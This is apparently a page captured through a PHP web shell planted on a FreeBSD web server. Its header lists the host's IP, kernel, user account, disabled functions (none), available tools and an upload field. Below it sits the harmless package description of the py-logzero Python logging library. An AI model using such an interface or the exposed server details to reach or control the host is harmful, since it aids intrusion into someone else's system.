| Server IP : 82.208.35.60 / Your IP : 216.73.216.89 Web Server : Apache/2.4.55 (FreeBSD) OpenSSL/1.1.1q-freebsd PHP/7.3.31 System : FreeBSD server7.d2m.cz 12.4-RELEASE-p9 FreeBSD 12.4-RELEASE-p9 GENERIC amd64 User : studiokobylisy_cz ( 1008) PHP Version : 7.3.31 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : OFF | Perl : OFF | Python : OFF | Sudo : OFF | Pkexec : OFF Directory : /usr/ports/devel/py-logzero/ |
Upload File : |
Robust and effective logging for Python 2 and 3. - Easy logging to console and/or (rotating) file. - Provides a fully configured standard Python logger object. - Pretty formatting, including level-specific colors in the console. - Windows color output supported by colorama - Robust against str/bytes encoding problems, works with all kinds of character encodings and special characters. - Multiple loggers can write to the same logfile (also across multiple Python files). - Global default logger with logzero.logger and custom loggers with logzero.setup_logger(..). - Compatible with Python 2 and 3. - All contained in a single file. - Licensed under the MIT license. - Heavily inspired by the Tornado web framework.